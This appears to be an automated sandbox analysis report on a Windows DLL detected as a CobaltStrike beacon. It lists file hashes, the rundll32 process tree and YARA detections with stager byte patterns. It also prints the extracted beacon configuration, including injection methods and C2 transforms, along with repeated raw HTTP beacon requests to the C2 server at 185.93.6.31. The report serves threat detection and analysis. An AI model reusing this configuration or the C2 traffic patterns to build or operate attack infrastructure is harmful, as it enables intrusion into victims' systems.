
Windows Analysis Report GnGmRmwtZJjkTEt.dll

Overview

General Information

Sample Name:GnGmRmwtZJjkTEt.dll
Analysis ID:490528
MD5:c84d4ead6c5a2afa9e844806de549dcf
SHA1:328b4f055dce47161d735ef74f982925def45ee5
SHA256:829751cfdc2376e916244f94baf839ce4491ccb75f0a89778c092bde79bd8643

Detection

CobaltStrike
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Malicious sample detected (through community Yara rule)
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Uses known network protocols on non-standard ports
Yara signature match
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
PE file contains more sections than normal
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 2760 cmdline: loaddll64.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll' MD5: A84133CCB118CF35D49A423CD836D0EF)
    • cmd.exe (PID: 4840 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 3012 cmdline: rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 1340 cmdline: rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 8081, "SleepTime": 10000, "MaxGetSize": 1400218, "Jitter": 48, "C2Server": "185.93.6.31,/Calculate/team/WIQK6GMJ", "HttpPostUri": "/explode/Credentials/6R1C1XVKLMP", "Malleable_C2_Instructions": ["Remove 1182 bytes from the end", "Remove 929 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\WUAUCLT.exe", "Spawnto_x64": "%windir%\\sysnative\\svchost.exe -k wksvc", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 18150, "ProcInject_PrependAppend_x86": ["ZpAPH4AAAAAADx9AAA8fRAAADx9EAAAPH0QAAGaQDx9AAA8fgAAAAAAPHwBmkGYPH4QAAAAAAA8fhAAAAAAA", "kGYPH4QAAAAAAA8fgAAAAACQDx8AkGaQUFgPHwAPH4QAAAAAAFBYDx8AUFhmDx9EAACQ"], "ProcInject_PrependAppend_x64": ["ZpBmkFBYDx+EAAAAAAAPH4AAAAAADx9AAA8fQABmDx+EAAAAAABmDx9EAAAPH0AADx9AAJCQUFgPH4AAAAAAZg8fhAAAAAAADx9EAABmkA8fhAAAAAAADx8A", "Zg8fRAAADx+AAAAAAGaQDx9AAA8fhAAAAAAADx9AAA8fRAAAkGYPH0QAAA8fAA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp | Cobaltbaltstrike_RAW_Payload_http_stager_x64 | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0xe0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp | Cobaltbaltstrike_RAW_Payload_http_stager_x64 | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0xe0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp | CobaltStrike_Sleep_Decoder_Indicator | Detects CobaltStrike sleep_mask decoder | yara@s3c.za.net
  • 0xfa48:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
  • 0x2abf2:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.rundll32.exe.6bc00000.0.unpack | Cobaltbaltstrike_RAW_Payload_http_stager_x64 | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0x1ee0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
3.2.rundll32.exe.6bc00000.0.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
5.2.rundll32.exe.6bc00000.0.unpack | Cobaltbaltstrike_RAW_Payload_http_stager_x64 | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0x1ee0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
5.2.rundll32.exe.6bc00000.0.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
4.2.rundll32.exe.6bc00000.0.unpack | Cobaltbaltstrike_RAW_Payload_http_stager_x64 | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0x1ee0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8081, "SleepTime": 10000, "MaxGetSize": 1400218, "Jitter": 48, "C2Server": "185.93.6.31,/Calculate/team/WIQK6GMJ", "HttpPostUri": "/explode/Credentials/6R1C1XVKLMP", "Malleable_C2_Instructions": ["Remove 1182 bytes from the end", "Remove 929 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\WUAUCLT.exe", "Spawnto_x64": "%windir%\\sysnative\\svchost.exe -k wksvc", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 18150, "ProcInject_PrependAppend_x86": ["ZpAPH4AAAAAADx9AAA8fRAAADx9EAAAPH0QAAGaQDx9AAA8fgAAAAAAPHwBmkGYPH4QAAAAAAA8fhAAAAAAA", "kGYPH4QAAAAAAA8fgAAAAACQDx8AkGaQUFgPHwAPH4QAAAAAAFBYDx8AUFhmDx9EAACQ"], "ProcInject_PrependAppend_x64": ["ZpBmkFBYDx+EAAAAAAAPH4AAAAAADx9AAA8fQABmDx+EAAAAAABmDx9EAAAPH0AADx9AAJCQUFgPH4AAAAAAZg8fhAAAAAAADx9EAABmkA8fhAAAAAAADx8A", "Zg8fRAAADx+AAAAAAGaQDx9AAA8fhAAAAAAADx9AAA8fRAAAkGYPH0QAAA8fAA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe, Network Connect: 185.93.6.31 145
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: 185.93.6.31
Uses known network protocols on non-standard ports
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=pRHTCAB4p6YCJFkJT5_EwfJWZSpSTDyXJfMauoDy3LzW-1V5NYYjk-cuvos6bJHEiI3u4nu3QAyglLLi2NTaa7-4L4-R0e2mGQ8ViSBqHV6P2TYckZz18q0rU8E6VJ_5UE73H-UdJaI717AOUo6ioBSgjyIYDyf-NaUo5HoCDLnLTJroUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=s2BnkT-YZUEkSjRWCZRXeeisyG8bnK5GKFHIcNS-J15T4PpFTzPT2XzKpncTq1KUy8yPP5W00OhvFGdOfAca-bz3QlPXNfkrmNIQf9NWBNdDqp9LJ0t8o8HZFk3g2iV1Q1--3dq6cKyUiRENnK2ILkLwVJQreViDXhcY9hfxEny1LxndUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=YPUU7u0Cq_70McNRSu4zkba14rctB_nNn9v3aTr1FzDPVu-hbD45sT20ucltnnmKH7CR2k9rsd4tn5D01jn8cbD-EqIP1gOc_9w0F6iFou_WGJRFEpQhQNu7HaCsi9H5FVtMl1djLYR1xeWZmUNRehu7VfyB99wG1IrfQ1U6q_ICWHLBUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=G3ex6b4exUe8Qjvo8fmmIEwwB8vsKl52m5V4Wz6Uvl1onTeYi-BBcllI3GqECvMlNuuMA8XRIu0e8tADZrK4igHeTW4vt49Hp2l3aJ4Mf78xv1T9L_qXExNNMSCEMv0Y7iiV_lt7R0OFsdLv7OjAQarG7cOmaUUfi8NKBcRkblh1KvgJUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rpXGOiJtxOo5v5X9FGH20vVZacQGaQ_tNaRp28lLhvVOFVvuUsZycmE_B9wOXvM_1jkulIhBcUNy4cblYfK7UqEC4_jKwFiAhSex1M6jpXxeXz7gOr7dCNwst-b9L4TeXqofdsdP0QeJfLCmgVgphV8F9T82jPkoQ-K5XQoEs9eo2rh2User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n7DjpjrZlwg4hWmndT70b8j3VYRo7Qw5H1IqFLpT7BLsWmXXDycTPd2PjiUAzaFqsizeTEEWcKKaNYJM4nXqxYUZHyGrcN0II64lJxrLLfC1eAayqz3FXJeKY28A9a9Xau_Hsd-8FQwBdoCgaC-SDi4Bv4wirhdQDwQYSkCjPBfx7apGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ykuj-0e8HOtej3RE4FCEhBwLVaKHuU7YNWVAfJBLoCVl6Fi0xoCOpJcKDtzHIM6ftQ4mz-XVBsuHISfhfIdLZBpApbelaLSJVWKDAgI7Ffp8piNQuCqWVXEFqrUGNWbsv-X7gv3dmpHfe1KMM_3mb7EF4ukrSWsTfjRoVv-EHOeo5sXUUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zTRrtkHMaWZaHjhxd8BbXpb4xEhlyKJhVgXEV6rqK3kttPZiMWff_gKeqlBt_16ztZiDGOvg3M8RQGtpAlMW3sKjTnSpYfUM5oYcWK0CCPA9_pNsWR9whL-NGmqejilSPQuy-qTufIvq3R0q4vmECTykWLNVLVSkIEMU0WmlHlvLexX6User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=3KDMj3nJuCF7lUaONi7bRovneq0r_SMQXEIFPflDwzuvSkr-TDc8FJ6foQxD3Y5D8TzxZQIGX4vZJa1loWXF7MYJMAjoYPIhYL4KDlnbAtn2aCmb6C3qddSaTEZD5YB-Kf_omJysOiVCZq-JKz-9J20RkKVhvjh5TBQ3YwOzEz6y_YVvUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ButdX4sc4k-SL4rgLPB6INCrqwZLGbB8-cW-2FzrXoGpSKYQCiBwAFuq8HgLgDA7ea7Yayl1-G9LgdlFsCe1wNbgWxNpyEotmcJ9ps6b616wBt30dIpo8b2lVBHKlZhIc0UFJjF9ZDUT26wo_10Yy32lHE3n6ZW3spSW8jMk4kNkRjtwUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=XnpmP9KCZO_JUDX45I5W1wW2ycH2hq_oxUvJ3jmkJvC--vvroinSd5HQp9n-sVM6JtaOkXiu0UaCDmbgkR0bV1HtQ_06L_iFdcgR0T5MBXmusJ7lylF9DSzDF-MNwCTbrkW_czegcQJ5kxCjcbeJgK_qVTrGY1ktsw0ZWPrrE9JYNRhzUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-j9zHHfIzAxu-6Sj0CRUYyx_hUW3zZ4_BRGQm6A_cMJVnIhT9vReQ6d-3jv3VB54hXr2KNWh1iy3VfcGTPObgyo0dVCVHGRuZRZT5TJPxR1M0vO3iF5GskFxelI2QbYLj5ErZc2pSnbvD4JrA4k2iIFxMg4bPbv0TkC4sc_wzACYkhUzUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=unjm4h8RkkwdTWzjUPbxK-0_UMBNJQl9OpovUJ-b6VbJkmCTKu8WefhHi2ElBaQul-TbCGTedea__YcIx73vgaDRGmWOuNhMBmYgYz8DKLSQsAP2jvXAGLJCZislPaoTTyfC9fp0EEgkvoXkTeeXSgvJusgHZhIUKswdDmVrOVPUJa8CUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-s7y9nY28CZt5KExQDrCHqECXQhSMjshYf9dF50QsjkaTm8iBp1GvjVkMxBaBcfzgmIaWNwaRY8muvIpNamPnvVZ1zSem2xM0XyFGJr4kbAKBAosbuXpxIh3gyqpdLASCvErupMU5cvdJ4Rq1QMdSQtewfNi183kF7mNkV5fhxv8gYy6User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=k_1myR4K2dkHObF2ueZBtkW9kJDeD4vqbNOFTsn9ZRc8Xp2GnzZLls68y-6elgut7Ljj_bxjw_nel-LTJTGOVkP2YIX83nG7DNRGMFuN0MglEOZi4ZxTZyizb4dfg6Pe5lM-sKRrX6OGzZe-aksjXeizJ9ty_64hJ4KtZKYy2dXxUADmUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8_dwoFaeBA5UwvqhGXlnaaSwxoIEqp8_cxW5EtYUfxSAHfbRY2CAO7HIHSNsijJs3mtNSi1R46T2chFKjjJ5w-lejCfHN04OT-m2IXaMvvbZP5W0x3pWWvvN8GlssjxRBqhUt7P7hgptMROmBGgBCEJGLIpO6YRWY0OLTCzkrxGdqjlAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=mMjIihQwyloP4ptNIjz4YsMEZ3QwNAFdA_lna_8WiEV4SFVeZJt8wldiCWw4A_2P4GQgJL4cf_NEvMhVV6-14pdf7Uj8nVYws3q_ZPj-q8xoAjBQDOPTuOpxuVbLcopuaPcRxvES37e_Ib4WtwUnNWlY-48A0feYdb-37TxZvWeeh7bGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aOtv7-Uc0P_8L7hQQvBIkL6rmbYlGYLMl8WMaDLrbDHHSJSgZCBCsDWqwshlgAKLF67q20d1yt8lgev13ieHcLjgaaMHyHid98JPFqCb2e7eBu9EGopaQdOlZqGklar4HUU3ll99VoV9256YkV0qexOlLv2J6acH3JSkQl0k0PMKRgnAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=9iHDV1NIt_lRFElWHK_UnqFmdXUBfCzIdsMK5dPCzOOFy0UmZrYzzLQertRpXIGb273-vSiHUFPzpKK9i-TKNOyIP9DC4f35Sj8F1nNaDQHc6SZDwqzlrf4bQ55pZI-mA37nQLYtNf1o56BRAb6y_0eQn31LPzehZpU4uykyHOaYfIq3User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n1yu4hKrEfILmHldtUeJnUkcWLvSrkPBYHJNZcVcrTww_1Wtk5eDvcIdA8WSN8OG4Bkr1rDCC9LSNir4KZBGfU9XqK7wf7mQAHWOG1csGOMpsS5J7T2bTCQSp6xTImv16vL2m6jKl4iKbF-VZurrduQS7_B-XmYKKyNlT6qTEf798cjNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=g0eC4A-_gDAUbdEnObOyCNiLLR4ru0s3GHYtAeSZwi9jxx80fxQ2qEztQwYjjLfl--tqTqWTNZlfM4I_TCD_iIzQpyLnEhxaqPX1DuNx4aZzjXo6F2yZ0vH-8zzQ_cAEc3hbrOqdld2krvR8rIptX3LXseUbXr3ybjD9hyfW9w2FCPysUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=oIPDnwXqtzEHtkmeSg3UVvfEdb1X3iwAIGEKLYVgzCvTaUXuMBQzBOK8rhw__oFTjR_-dX4lUJulBqJ13UbK_LoqPxiUQ_0xHJ0FHiX4DcmKSyaLlA7lZai5Q1Y_xo9uVdzniOCPNTU-RaCZVxyyNxEyn7UdnTdpMDc4c3-QHC7O3op_User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NO4zVLkZjESgKuTrHvUUK-KuxQ15HN53y8DQ027uMIqbTcgbOCUeC2mvnnM5hV4wS6u2YBtwlmR5hLdOgiLby-TlNRhbzSQmq8cTrfyehVWCA7P_Ro8G-o-gOhr4kPZDQUBrLQN4Cj4h3sIjzVh2wE-gckbV7Pu8gJH4-QEhjEhWQ1V7User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=92pnD3uSZd9gQDTITZ5X56ymyPFflq7YbFvI7pC0J8AX6vrbCznTRzjApulXoVIKj8aPodG-0HYrHmfQOA0aZ_j9Qs2TP_m13NgQ4ZdcBEkHoJ_VY0F8PYXTFtOk0CXrB1W-Q56wcDLQgxGT2KeIsAb6VApvc1gdGh0YaFP7EuLxJRlDUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
